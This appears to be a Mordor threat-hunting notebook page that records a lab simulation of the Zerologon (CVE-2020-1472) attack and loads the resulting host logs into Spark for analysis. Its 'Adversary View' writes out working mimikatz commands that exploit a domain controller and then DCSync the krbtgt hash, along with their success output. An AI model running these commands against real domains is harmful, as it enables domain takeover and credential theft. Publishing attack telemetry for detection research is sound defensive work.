.ipynb .pdf

repository open issue suggest edit

Binder Colab Live Code

Contents

Mimikatz Netlogon Unauthenticated NetrServerAuthenticate2

Metadata

Author	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2020/09/16
Modification Date	2020/09/16
Tactics	[‘TA0008’]
Techniques	[‘T1210’]
Tags	[‘CVE-2020-1472’, ‘Password Update’, ‘Netlogon Insecure AES-CFB8’]

Dataset Description

This dataset represents adversaries leveraging a vulnerability (CVE-2020-1472) in a cryptographic authentication scheme used by the Netlogon Remote Protocol, which among other things can be used to update computer passwords. This vulnerability was discovered by @@SecuraBV.

Datasets Downloads

Dataset Type	Link
Host	https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2.zip
Network	https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/network/mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2.zip

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author	Name	Link

Simulation Plan

Environment	Tool Type	Module
Mordor shire	C2	ShellCmd
Mordor shire	tool	lsadump
Mordor shire	tool	SharpZeroLogon

Adversary View

Mimikatz Implementation (NetrServerAuthenticate2)
=================================================

(wardog) > ShellCmd /shellcommand:"C:\Users\pgustavo\Downloads\mimikatz_trunk\x64\mimikatz.exe \"lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit\" exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 16 2020 12:02:22
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > http://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/


mimikatz(commandline) # lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit

Target : MORDORDC.theshire.local
Account: MORDORDC$
Type   : 6 (Server)
Mode   : exploit

Trying to 'authenticate'...
====================================================

NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000

* Authentication: OK -- vulnerable
* Set password  : OK -- may be unstable

mimikatz(commandline) # exit

Bye!

DCSync Follow-up (Optional)
(wardog) > ShellCmd /shellcommand:"C:\Users\pgustavo\Downloads\mimikatz_trunk\x64\mimikatz.exe \"lsadump::dcsync /domain:theshire.local /dc:MORDORDC.theshire.local /user:krbtgt /authuser:MORDORDC$ /authdomain:theshire /authpassword:\\"\\" /authntlm\" exit"

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")

[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)

+---------------------------+------------------------------------+-------+-----+
|Hostname                   |Channel                             |EventID|count|
+---------------------------+------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|7      |102  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|12     |99   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |88   |
|WORKSTATION6.theshire.local|Security                            |4658   |64   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|13     |59   |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |50   |
|WORKSTATION6.theshire.local|Security                            |4656   |32   |
|WORKSTATION6.theshire.local|Security                            |4690   |32   |
|WORKSTATION6.theshire.local|Security                            |4663   |32   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|7      |25   |
|MORDORDC.theshire.local    |Security                            |5156   |21   |
|WORKSTATION5.theshire.local|Security                            |5158   |20   |
|MORDORDC.theshire.local    |Security                            |5158   |16   |
|WORKSTATION5.theshire.local|Security                            |5156   |16   |
|WORKSTATION6.theshire.local|Security                            |5156   |15   |
|WORKSTATION6.theshire.local|Security                            |5158   |15   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|3      |9    |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|12     |7    |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|11     |6    |
|WORKSTATION5.theshire.local|Security                            |4658   |6    |
+---------------------------+------------------------------------+-------+-----+
only showing top 20 rows

Empire Remote WMIC Add User Empire Invoke WMI